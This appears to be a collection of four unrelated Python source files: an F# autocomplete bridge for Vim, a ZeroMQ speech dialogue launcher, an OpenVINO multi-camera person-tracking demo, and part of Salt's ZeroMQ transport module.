source
|
python
|
|---|---|
fsharpvim.py
|
from subprocess import Popen, PIPE
from os import path
import string
import tempfile
import unittest
import json
import threading
class Statics:
fsac = None
locations = []
class Interaction:
def __init__(self, proc, timeOut, logfile = None):
self.data = None
self.event = threading.Event()
self.proc = proc
self._timeOut = timeOut
self.logfile = logfile
self.debug = logfile is not None
def _write(self, txt):
self.proc.stdin.write(txt)
if self.debug:
self.logfile.write("> " + txt)
self.logfile.flush()
def send(self, command):
self.data = None
self.event.clear()
self._write(command)
self.event.wait(self._timeOut)
if self.debug:
self.logfile.write('msg received %s\n' % self.data)
return self.data
# only on worker thread
def update(self, data):
self.data = data
self.event.set()
class FSAutoComplete:
def __init__(self, dir, debug = False):
if debug:
self.logfiledir = tempfile.gettempdir() + "/log.txt"
self.logfile = open(self.logfiledir, "w")
else:
self.logfile = None
command = ['mono', dir + '/bin/fsautocomplete.exe']
opts = { 'stdin': PIPE, 'stdout': PIPE, 'universal_newlines': True }
try:
self.p = Popen(command, **opts)
except WindowsError:
self.p = Popen(command[1:], **opts)
self.debug = debug
self.switch_to_json()
self.completion = Interaction(self.p, 3, self.logfile)
self._finddecl = Interaction(self.p, 1, self.logfile)
self._tooltip = Interaction(self.p, 1, self.logfile)
self._helptext = Interaction(self.p, 1, self.logfile)
self._errors = Interaction(self.p, 3, self.logfile)
self._project = Interaction(self.p, 3, self.logfile)
self.worker = threading.Thread(target=self.work, args=(self,))
self.worker.daemon = True
self.worker.start()
def __log(self, msg):
if self.debug:
self.logfile.write(msg)
def send(self, txt):
if self.debug:
self.logfile.write("> " + txt)
self.logfile.flush()
self.p.stdin.write(txt)
def work(self,_):
if self.debug:
self.logfile2 = open(tempfile.gettempdir() + "/log2.txt", "w")
while True:
data = self.p.stdout.readline()
if self.debug:
self.logfile2.write("::work read: %s" % data)
parsed = json.loads(data)
if parsed['Kind'] == "completion":
self.completion.update(parsed['Data'])
elif parsed['Kind'] == "tooltip":
self._tooltip.update(parsed['Data'])
elif parsed['Kind'] == "helptext":
self._helptext.update(parsed['Data'])
elif parsed['Kind'] == "errors":
self._errors.update(parsed['Data'])
elif parsed['Kind'] == "project":
self._project.update(parsed['Data'])
elif parsed['Kind'] == "finddecl":
self._finddecl.update(parsed['Data'])
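# Illustrative sketch of the wire format handled by the dispatch above (the
# 'Kind' / 'Data' field names come from this code; the completion values are
# made-up examples): fsautocomplete writes one JSON object per line, e.g.
#   {"Kind": "completion", "Data": ["Map", "MapAsync"]}
# and the worker thread hands the "Data" payload to the Interaction matching
# "Kind", which wakes the caller blocked in Interaction.send().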
def help(self):
self.send("help\n")
def switch_to_json(self):
self.send("outputmode json\n")
def project(self, fn):
self.send("project \"%s\"\n" % path.abspath(fn))
def parse(self, fn, full, lines):
fulltext = "full" if full else ""
self.send("parse \"%s\" %s\n" % (fn, fulltext))
for line in lines:
self.send(line + "\n")
self.send("<<EOF>>\n")
def quit(self):
self.send("quit\n")
self.p.wait()
if self.debug:
self.logfile.close()
def complete(self, fn, line, column, base):
self.__log('complete: base = %s\n' % base)
msg = self.completion.send('completion "%s" %d %d\n' % (fn, line, column))
self.__log('msg received %s\n' % msg)
msg = [str(line) for line in msg]
if base != '':
msg = [line for line in msg
if base.lower() in line.lower()]
msg.sort(key=lambda x: x.startswith(base), reverse=True)
msg = [{'word': line,
'info': self.helptext(line),
'menu': ""} for line in msg]
return msg
def finddecl(self, fn, line, column):
msg = self._finddecl.send('finddecl "%s" %d %d\n' % (fn, line, column))
if msg is not None:
return str(msg['File']), (int(str(msg['Line'])), int(str(msg['Column'])))
else:
return None
def errors(self, fn, full, lines):
self.__log('errors: fn = %s\n' % fn)
fulltext = "full" if full else ""
self.send("parse \"%s\" %s\n" % (fn, fulltext))
for line in lines:
self.send(line + "\n")
msg = self._errors.send("<<EOF>>\n")
return msg
def tooltip(self, fn, line, column):
msg = self._tooltip.send('tooltip "%s" %d %d 500\n' % (fn, line, column))
if msg is not None:
return str(msg)
else:
return ""
def helptext(self, candidate):
msg = self._helptext.send('helptext %s\n' % candidate)
return str(msg[candidate])
class FSharpVimFixture(unittest.TestCase):
def setUp(self):
self.fsac = FSAutoComplete('.')
self.testscript = 'test/TestScript.fsx'
with open(self.testscript, 'r') as content_file:
content = [line.strip('\n') for line in content_file]
self.fsac.parse(self.testscript, True, content)
def tearDown(self):
self.fsac.quit()
def test_completion(self):
completions = self.fsac.complete(self.testscript, 8, 16, '')
if __name__ == '__main__':
unittest.main()
|
run_simple_dialogue_system.py
|
from time import sleep, time
import zmq
import multiprocessing as mp
from speech_to_text import speech_to_text_main
from dialogue_control import control_main
from text_to_speech import text_to_speech_main
def start_pubsub_proxy(port_config):
""" This is the pubsub proxy. We start it in another process as it blocks until we kill it"""
# create the zmq proxy. This must be started in its own thread or process or it will block
context_proxy = zmq.Context()
# socket that others publish to
publish_to_socket = context_proxy.socket(zmq.XSUB)
publish_to_socket.bind("tcp://*:{}".format(port_config["pub_to_proxy_port"]))
# socket that others subscribe to
subscribe_to_socket = context_proxy.socket(zmq.XPUB)
subscribe_to_socket.bind("tcp://*:{}".format(port_config["sub_to_proxy_port"]))
# now start the proxy
zmq.proxy(publish_to_socket, subscribe_to_socket)
def start_all_processes(process_funcs, port_config):
""" Starts up processes"""
# empty list for storing processes
process_list = []
# start processes
for pf in process_funcs:
# start speech to text process
new_process = mp.Process(target=pf, kwargs={"port_config": port_config})
new_process.start()
process_list.append(new_process)
return process_list
def stop_all_processes(process_list):
"""Terminates all processes"""
for p in process_list:
print("terminating process", p)
p.terminate()
def run_main(port_config=None):
""" This is responsible for starting up the system and shutting it down, either due to keyboard interrupt or the
system itself shutting down"""
t_sleep = 0.1
# set default ports
if port_config is None:
port_config = {"system_sync_port": 5553, # report for system to check that modules are sync'ed properly
"pub_to_proxy_port": 5554, # port to publish to proxy so in the proxy it is xsub
"sub_to_proxy_port": 5555, # port to subscribe to the proxy so in the proxy it is xpub
"stt_req_rep_port": 5556, # REQ-REP control port for the stt pub sub
"tts_req_rep_port": 5557, # REQ-REP port for the text to speech
}
# ------------------------------------------------------------------------------------------------------------------
# Start the pub sub proxy. Do this first to make sure it's there.
mp.set_start_method("spawn") # set this to make sure code works cross platform
proxy_process = mp.Process(target=start_pubsub_proxy, kwargs={"port_config": port_config})
proxy_process.start()
sleep(t_sleep)
print("proxy created")
# ------------------------------------------------------------------------------------------------------------------
# make the context for the main process and connect to the pubsub proxy
context = zmq.Context()
sockets_list = []
socket_system_sync = context.socket(zmq.REP)
socket_system_sync.bind("tcp://*:{}".format(port_config["system_sync_port"]))
sockets_list.append(socket_system_sync)
# make publish to proxy socket
socket_publisher = context.socket(zmq.PUB)
socket_publisher.connect("tcp://localhost:{}".format(port_config["pub_to_proxy_port"]))
sockets_list.append(socket_publisher)
# make subscribe to proxy socket
socket_subscriber = context.socket(zmq.SUB)
socket_subscriber.connect("tcp://localhost:{}".format(port_config["sub_to_proxy_port"]))
socket_subscriber.setsockopt(zmq.SUBSCRIBE, b"CONTROL")
sockets_list.append(socket_subscriber)
# make poller because we are listening to both the subscriber and the stt_reply sockets
poller = zmq.Poller()
poller.register(socket_subscriber, zmq.POLLIN)
sleep(t_sleep)
# ------------------------------------------------------------------------------------------------------------------
# start up the processes
process_funcs = [control_main,
text_to_speech_main,
speech_to_text_main]
process_list = start_all_processes(process_funcs, port_config)
# wait to be told that all processes have connected their sockets and are ready to go.
connected_modules = 0
while connected_modules < len(process_funcs):
# wait for sync request
msg = socket_system_sync.recv()
socket_system_sync.send(b"")
connected_modules += 1
print("The {} process has connected all sockets and has initialized all functionality.".format(msg.decode()))
# append the proxy to the list of processes so we can shut the proxy process down later
process_list.append(proxy_process)
sleep(0.1)
# ------------------------------------------------------------------------------------------------------------------
# Publish start message
socket_publisher.send_multipart([b"SYSTEM", b"START"])
# Now just hold until we receive a shutdown message or a keyboard interrupt
try:
while True:
socks = dict(poller.poll(100)) # poll for 100 ms, don't block indefinitely
if socket_subscriber in socks and socks[socket_subscriber] == zmq.POLLIN:
topic, message = socket_subscriber.recv_multipart()
if topic == b"CONTROL" and message == b"SHUTDOWN":
break
sleep(t_sleep)
except KeyboardInterrupt:
print("Interrupt received, stopping ...")
# TODO figure out if it can be shut down cleanly with keyboard interrupt or if I need to do something different
finally:
print("Cleaning up ...")
stop_all_processes(process_list)
print("All processes stopped.")
# Close sockets and context
for sock in sockets_list:
sock.setsockopt(zmq.LINGER, 0)
sock.close()
context.term()
print("Main process shutdown.")
if __name__ == "__main__":
run_main()
|
multi_camera_multi_target_tracking.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2019-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import datetime
import json
import logging as log
import os
import queue
import random
import subprocess
import sys
import time
from collections import defaultdict
from os.path import splitext
from pathlib import Path
from threading import Lock, Thread
import cv2 as cv
from openvino.inference_engine import \
IECore # pylint: disable=import-error,E0611
from .mc_tracker.mct import MultiCameraTracker
from .utils.analyzer import save_embeddings
from .utils.classify_persons import classify_persons_per_frame
from .utils.misc import (AverageEstimator, check_pressed_keys, read_py_config,
set_log_config)
from .utils.network_wrappers import (DetectionsFromFileReader, Detector,
MaskRCNN, VectorCNN)
from .utils.network_wrappers_yolo import YOLOV4, YOLOV4Tiny
from .utils.video import MulticamCapture, NormalizerCLAHE
from .utils.visualization import get_target_size, visualize_multicam_detections
sys.path.append(os.path.join(os.path.dirname(
os.path.dirname(os.path.abspath(__file__))), 'common'))
# monitors must be imported after the 'common' directory is added to sys.path above.
import monitors
set_log_config()
OUTPUT_VIDEO_SIZE_LIMIT = 1000 * 1024 * 1024 # 1GB
MAX_GET_FRAME_TIMES = 50
threading_lock = Lock()
def check_detectors(args):
detectors = {
'--m_detector': args.m_detector,
'--m_segmentation': args.m_segmentation,
'--detections': args.detections
}
non_empty_detectors = [(det, value)
for det, value in detectors.items() if value]
det_number = len(non_empty_detectors)
if det_number == 0:
log.error('No detector specified, please specify one of the following parameters: '
'\'--m_detector\', \'--m_segmentation\' or \'--detections\'')
elif det_number > 1:
det_string = ''.join('\n\t{}={}'.format(
det[0], det[1]) for det in non_empty_detectors)
log.error('Only one detector expected but got {}, please specify one of them:{}'
.format(len(non_empty_detectors), det_string))
return det_number
def update_detections(output, detections, frame_number):
for i, detection in enumerate(detections):
entry = {'frame_id': frame_number, 'scores': [], 'boxes': []}
for det in detection:
entry['boxes'].append(det[0])
entry['scores'].append(float(det[1]))
output[i].append(entry)
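# Illustrative shape of the structure built above, one list per video source
# (the coordinate layout of the boxes is an assumption about the detector
# output; boxes come from det[0] and scores from det[1]):
#   output[i] == [{'frame_id': 0,
#                  'scores': [0.98, 0.87],
#                  'boxes': [[x1, y1, x2, y2], [x1, y1, x2, y2]]}, ...]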
def save_json_file(save_path, data, description=''):
save_dir = os.path.dirname(save_path)
if save_dir and not os.path.exists(save_dir):
os.makedirs(save_dir)
with open(save_path, 'w') as outfile:
json.dump(data, outfile)
if description:
log.info('{} saved to {}'.format(description, save_path))
class FramesThreadBody:
def __init__(self, capture, max_queue_length=2):
self.process = True
self.frames_queue = queue.Queue()
self.seconds_queue = queue.Queue()
self.capture = capture
self.max_queue_length = max_queue_length
self.retry_times = 0
def __call__(self):
while self.process:
if self.frames_queue.qsize() > self.max_queue_length:
time.sleep(0.1)
continue
has_frames, frames, seconds = self.capture.get_frames()
if not has_frames and self.frames_queue.empty():
self.retry_times += 1
if self.retry_times >= MAX_GET_FRAME_TIMES:
self.process = False
log.warning(f'No frames after {self.retry_times} attempts, exiting.')
break
if has_frames:
self.retry_times = 0
self.frames_queue.put(frames)
self.seconds_queue.put(seconds)
def run(params, config, capture, detector, reid, classify_person_flow=None):
win_name = 'Multi camera tracking'
frame_number = 0
avg_latency = AverageEstimator()
output_detections = [[] for _ in range(capture.get_num_sources())]
key = -1
if config['normalizer_config']['enabled']:
capture.add_transform(
NormalizerCLAHE(
config['normalizer_config']['clip_limit'],
config['normalizer_config']['tile_size'],
)
)
tracker = MultiCameraTracker(capture.get_num_sources(), reid, config['sct_config'], **config['mct_config'],
visual_analyze=config['analyzer'])
thread_body = FramesThreadBody(
capture, max_queue_length=len(capture.captures) * 2)
frames_thread = Thread(target=thread_body)
frames_thread.start()
rtsp_mode = params.output_video.startswith('rtsp://')
if len(params.output_video):
frame_size, source_fps = capture.get_source_parameters()
if params.fps:
source_fps = [params.fps]
target_width, target_height = get_target_size(
frame_size, None, **config['visualization_config'])
video_output_size = (target_width, target_height)
fourcc = cv.VideoWriter_fourcc(*'XVID')
if rtsp_mode:
# https://gist.github.com/takidog/2c981c34d5d5b41c0d712f8ef4ac60d3
# E.g. rtsp://localhost:8554/output
# Use "-c copy" would increase video quality but slowdown process
command = ['ffmpeg',
'-i', '-',
'-f', 'rtsp',
params.output_video]
output_video = subprocess.Popen(command, stdin=subprocess.PIPE)
else:
output_video = cv.VideoWriter(
params.output_video, fourcc, min(source_fps), video_output_size)
else:
output_video = None
prev_frames = thread_body.frames_queue.get()
detector.run_async(prev_frames, frame_number)
presenter = monitors.Presenter(params.utilization_monitors, 0)
start_time = datetime.datetime.now()
action_to_person_ids = defaultdict(set)
while thread_body.process:
try:
tick = datetime.datetime.now()
if not params.no_show:
key = check_pressed_keys(key)
if key == 27:
break
presenter.handleKey(key)
start = time.perf_counter()
try:
frames = thread_body.frames_queue.get_nowait()
seconds = thread_body.seconds_queue.get_nowait()
except queue.Empty:
frames = None
seconds = None
if frames is None:
continue
all_detections = detector.wait_and_grab()
if params.save_detections:
update_detections(output_detections, all_detections, frame_number)
frame_number += 1
frame_times = [start_time + datetime.timedelta(0, s) for s in seconds]
detector.run_async(frames, frame_number)
all_masks = [[] for _ in range(len(all_detections))]
for i, detections in enumerate(all_detections):
all_detections[i] = [det[0] for det in detections]
all_masks[i] = [det[2] for det in detections if len(det) == 3]
tracker.process(prev_frames, all_detections, all_masks)
tracked_objects = tracker.get_tracked_objects()
latency = max(time.perf_counter() - start, sys.float_info.epsilon)
avg_latency.update(latency)
fps = round(1. / latency, 1)
person_class_dict = {}
if classify_person_flow:
# Crop persons to classify before drawing
person_class_dict = classify_persons_per_frame(
frame_times, prev_frames, tracked_objects, classify_person_flow, **config['visualization_config'])
for person_id, (person_class, detect_lines, person_action) in person_class_dict.items():
if person_action:
action_to_person_ids[person_action].add(person_id)
vis = visualize_multicam_detections(
frame_times, prev_frames, tracked_objects, action_to_person_ids, person_class_dict, fps, **config['visualization_config'])
presenter.drawGraphs(vis)
if not params.no_show:
cv.imshow(win_name, vis)
if output_video:
if rtsp_mode:
ret, frame = cv.imencode('.jpg', vis)
if ret:
output_video.stdin.write(frame.tobytes())
else:
output_video.write(cv.resize(vis, video_output_size))
output_video_file = Path(params.output_video)
if output_video_file.stat().st_size > OUTPUT_VIDEO_SIZE_LIMIT:
output_video_file.unlink()
output_video = cv.VideoWriter(
params.output_video, fourcc, min(source_fps), video_output_size)
if params.output_image:
# https://blog.gtwang.org/programming/python-threading-multithreaded-programming-tutorial/
Thread(target = write_output_image, args = (params.output_image, vis,)).start()
# print('\rProcessing frame: {}, fps = {} (avg_fps = {:.3})'.format(
# frame_number, fps, 1. / avg_latency.get()), end="")
prev_frames, frames = frames, prev_frames
tock = datetime.datetime.now()
diff = tock - tick
# https://stackoverflow.com/questions/5419389/how-to-overwrite-the-previous-print-to-stdout-in-python
print(frame_times, f'takes {diff.total_seconds()}s', end='\r')
except Exception as e:
thread_body.process = False
raise e
print(presenter.reportMeans())
print('')
thread_body.process = False
frames_thread.join()
if len(params.history_file):
save_json_file(params.history_file, tracker.get_all_tracks_history(
), description='History file')
if len(params.save_detections):
save_json_file(params.save_detections,
output_detections, description='Detections')
if len(config['embeddings']['save_path']):
save_embeddings(tracker.scts, **config['embeddings'])
def write_output_image(output_image, vis):
file_path, ext = splitext(output_image)
tmp_file_name = f'{file_path}.tmp{ext}'
threading_lock.acquire()
cv.imwrite(tmp_file_name, vis, [int(cv.IMWRITE_JPEG_QUALITY), 80])
os.rename(tmp_file_name, output_image)
threading_lock.release()
def main(classify_person_flow=None, inputs=None, output_video=None, output_image=None):
"""Prepares data for the object tracking demo"""
current_dir = os.path.dirname(os.path.abspath(__file__))
parser = argparse.ArgumentParser(fromfile_prefix_chars='@', description='Multi camera multi object \
tracking live demo script')
parser.add_argument('-i', type=str, nargs='+', help='Input sources (indexes \
of cameras or paths to video files)', default=inputs, required=False)
parser.add_argument('--config', type=str, default=os.path.join(current_dir, 'configs/person.py'), required=False,
help='Configuration file')
parser.add_argument('--detections', type=str,
help='JSON file with bounding boxes')
parser.add_argument('-m', '--m_detector', type=str, required=False,
help='Path to the object detection model')
parser.add_argument('--t_detector', type=float, default=0.6,
help='Threshold for the object detection model')
parser.add_argument('--m_segmentation', type=str, required=False,
help='Path to the object instance segmentation model')
parser.add_argument('--t_segmentation', type=float, default=0.6,
help='Threshold for object instance segmentation model')
parser.add_argument('--m_reid', type=str, required=False,
help='Path to the object re-identification model')
parser.add_argument('--output_video', type=str, default=output_video, required=False,
help='Optional. Path to output video')
parser.add_argument('--output_image', type=str, default=output_image, required=False,
help='Optional. Path to output image')
parser.add_argument('--history_file', type=str, default='', required=False,
help='Optional. Path to file in JSON format to save results of the demo')
parser.add_argument('--save_detections', type=str, default='', required=False,
help='Optional. Path to file in JSON format to save bounding boxes')
parser.add_argument(
"--no_show", help="Optional. Don't show output", action='store_true')
parser.add_argument('-d', '--device', type=str, default='CPU')
parser.add_argument('-l', '--cpu_extension',
help='MKLDNN (CPU)-targeted custom layers. Absolute \
path to a shared library with the kernel implementations.',
type=str, default=None)
parser.add_argument('-u', '--utilization_monitors', default='', type=str,
help='Optional. List of monitors to show initially.')
parser.add_argument('--fps', type=float, required=True)
parser.add_argument("--seek_mode", help="", action='store_true')
args, _ = parser.parse_known_args()
if check_detectors(args) != 1:
sys.exit(1)
if len(args.config):
log.info('Reading configuration file {}'.format(args.config))
config = read_py_config(args.config)
else:
log.error(
'No configuration file specified. Please specify parameter \'--config\'')
sys.exit(1)
random.seed(config['random_seed'])
capture = MulticamCapture(args.i, args.seek_mode, args.fps)
log.info("Creating Inference Engine")
ie = IECore()
if args.detections:
object_detector = DetectionsFromFileReader(
args.detections, args.t_detector)
elif args.m_segmentation:
object_detector = MaskRCNN(ie, args.m_segmentation,
config['obj_segm']['trg_classes'],
args.t_segmentation,
args.device, args.cpu_extension,
capture.get_num_sources())
else:
if 'yolov4' in args.m_detector:
# Person class index is 0
trg_classes = [0]
if 'tiny' in args.m_detector:
out_blob = 'ALL'
object_detector = YOLOV4Tiny(ie, args.m_detector,
trg_classes,
args.t_detector,
args.device, args.cpu_extension,
capture.get_num_sources(), out_blob=out_blob)
else:
out_blob='output'
object_detector = YOLOV4(ie, args.m_detector,
trg_classes,
args.t_detector,
args.device, args.cpu_extension,
capture.get_num_sources(), out_blob=out_blob)
else:
object_detector = Detector(ie, args.m_detector,
config['obj_det']['trg_classes'],
args.t_detector,
args.device, args.cpu_extension,
capture.get_num_sources())
if args.m_reid:
object_recognizer = VectorCNN(
ie, args.m_reid, args.device, args.cpu_extension)
else:
object_recognizer = None
run(args, config, capture, object_detector,
object_recognizer, classify_person_flow)
log.info('Finished successfully')
if __name__ == '__main__':
main()
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import copy
import errno
import signal
import socket
import hashlib
import logging
import weakref
import threading
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.log.setup
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.zeromq
import salt.utils.versions
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError, SaltException
from salt._compat import ipaddress
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import salt.ext.tornado
import salt.ext.tornado.ioloop
import salt.ext.tornado.gen
import salt.ext.tornado.concurrent
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
def _get_master_uri(master_ip,
master_port,
source_ip=None,
source_port=None):
'''
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using an IP address and binding to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
'''
from salt.utils.zeromq import ip_bracket
master_uri = 'tcp://{master_ip}:{master_port}'.format(
master_ip=ip_bracket(master_ip), master_port=master_port)
if source_ip or source_port:
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip and source_port:
master_uri = 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format(
source_ip=ip_bracket(source_ip), source_port=source_port,
master_ip=ip_bracket(master_ip), master_port=master_port)
elif source_ip and not source_port:
master_uri = 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format(
source_ip=ip_bracket(source_ip),
master_ip=ip_bracket(master_ip), master_port=master_port)
elif source_port and not source_ip:
ip_any = '0.0.0.0' if ipaddress.ip_address(master_ip).version == 4 else ip_bracket('::')
master_uri = 'tcp://{ip_any}:{source_port};{master_ip}:{master_port}'.format(
ip_any=ip_any, source_port=source_port,
master_ip=ip_bracket(master_ip), master_port=master_port)
else:
log.warning('Unable to connect to the Master using a specific source IP / port')
log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6')
log.warning('Specific source IP / port for connecting to master returner port: configuration ignored')
return master_uri
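# Illustrative return values (addresses and ports are made-up examples):
#   _get_master_uri('192.168.1.1', 4506)
#       -> 'tcp://192.168.1.1:4506'
#   _get_master_uri('192.168.1.1', 4506, source_ip='192.168.1.17', source_port=5555)
#       -> 'tcp://192.168.1.17:5555;192.168.1.1:4506'
#          (requires libzmq >= 4.1.6 and pyzmq >= 16.0.1, as checked above)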
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
install_zmq()
io_loop = ZMQDefaultLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncZeroMQReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
log.trace('Inserted key into loop_instance_map id %s for key %s and process %s',
id(loop_instance_map), key, os.getpid())
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug('Re-using AsyncZeroMQReqChannel for %s', key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop', '_refcount', '_refcount_lock'):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClientPool(result.opts,
args=(result.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop}))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
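# Illustrative key tuple produced above (values are made-up examples):
#   ('/etc/salt/pki/minion', 'minion-01', 'tcp://192.168.1.1:4506', 'aes')
# One channel instance is cached per such tuple and per io_loop.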
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
install_zmq()
self._io_loop = ZMQDefaultLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since it's a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.master_uri)
self.message_client = AsyncReqMessageClientPool(self.opts,
args=(self.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop})
self._closing = False
def close(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
'This is not the last %s instance. Not closing yet.',
self.__class__.__name__
)
return
log.debug('Closing %s instance', self.__class__.__name__)
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self._io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self._io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self._io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
@property
def master_uri(self):
if 'master_uri' in self.opts:
return self.opts['master_uri']
# if by chance master_uri is not there..
if 'master_ip' in self.opts:
return _get_master_uri(self.opts['master_ip'],
self.opts['master_port'],
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_ret_port'))
# if we've reached here something is very abnormal
raise SaltException('ReqChannel: missing master_uri/master_ip in self.opts')
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if 'key' not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret['key'],
RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of attempts to make before failing
:param int timeout: The number of seconds on a response before failing
'''
@salt.ext.tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not always have data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# Attempt the transfer; on an authentication error, re-authenticate and retry below.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
